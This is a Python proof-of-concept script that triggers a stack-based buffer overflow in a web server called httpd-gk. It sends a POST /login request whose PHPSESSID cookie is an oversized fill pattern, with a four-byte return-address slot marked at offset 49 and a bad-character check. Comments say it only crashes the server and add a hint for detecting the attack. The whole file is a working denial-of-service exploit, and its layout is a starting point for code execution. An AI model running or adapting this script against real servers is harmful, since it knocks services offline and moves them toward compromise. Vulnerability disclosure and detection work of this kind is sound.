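#!/usr/bin/env python
# marco.lux@curesec.com
# trigger for httpd-gk vanilla stack based overflow
# June 2023
#
# Crash trigger only: sends a single POST /login whose PHPSESSID cookie is an
# oversized fill pattern (no shellcode) and expects the server to fault.
# Detection hint: a PHPSESSID cookie several hundred bytes long on POST /login
# is far outside the size of a real session id and is easy to alert on.
import os
import sys
import socket
import requests            # unused by this script; kept from the original
import binascii
from IPython import embed  # unused by this script; kept from the original

# Bytes the original author treats as "bad" for the cookie value
# (NUL, space, double quote, '='); kept as a module constant.
BAD_CHARS = [b'\x00', b'\x20', b'\x22', b'\x3d']


def check_badchars(payload):
    """Print a warning for each BAD_CHARS entry present in *payload*.

    Only the first occurrence of each bad byte is reported (one find() per
    byte instead of the original's two). Returns None; the caller decides
    whether to proceed.
    """
    for bc in BAD_CHARS:
        pos = payload.find(bc)
        if pos != -1:
            print('ATTENTION! Badchar detected! {0} at pos {1}'.format(binascii.b2a_hex(bc), pos))


# trigger
def setup_pkt(host, port, payload):
    """Build the raw HTTP/1.1 POST /login request with *payload* as the PHPSESSID cookie.

    Content-Length is derived from the body instead of being hard-coded; the
    original's fixed 45 matched this exact body, so the output is unchanged,
    but the header stays correct if the body is ever edited.
    """
    body = b'login=login&username=root&password=nothing%3D'
    lines = [
        b'POST /login HTTP/1.1',
        b'Host: ' + host.encode() + b':' + str(port).encode(),
        b'Cookie: PHPSESSID=' + payload,
        b'Connection: close',
        b'Content-Length: ' + str(len(body)).encode(),
        b'',  # blank line terminates the header block
        body,
    ]
    return b'\r\n'.join(lines)


def me_connect(host, port, timeout=None):
    """Open a TCP connection to (host, port) and return the connected socket.

    *timeout* is passed to socket.create_connection; the default None keeps
    the original blocking behaviour. create_connection also resolves
    IPv6 targets, which the original AF_INET-only socket did not.
    """
    return socket.create_connection((host, port), timeout=timeout)


def main(argv):
    """Parse <host> <port>, check the pattern for bad bytes, send one request.

    Returns a process exit status (2 on usage error, 0 otherwise).
    """
    if len(argv) != 3:
        # the original indexed sys.argv unguarded and died with IndexError
        print(f"usage: {argv[0]} <host> <port>")
        return 2
    host = argv[1]
    port = int(argv[2])

    # our shellcode  -- in fact only a fill pattern: 49 + 4 + 512 bytes, no code
    payload = b"A" * 49 + b"R" * 4 + b"B" * 512

    # target stuff
    print("[+] Payload crashes webserver...")
    print('[+] Checking for badchars...')
    check_badchars(payload)
    print(f"[+] Connecting {host}:{port}")
    # the context manager closes the socket even if sendall() raises;
    # the original never closed it
    with me_connect(host, port) as s:
        print("[+] Setup payload...")
        pp = setup_pkt(host, port, payload)
        print("[+] Sending payload...")
        # sendall() retries until the whole request is queued; send() may stop short
        s.sendall(pp)
    # end
    print("Done")
    # check core file on target system
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))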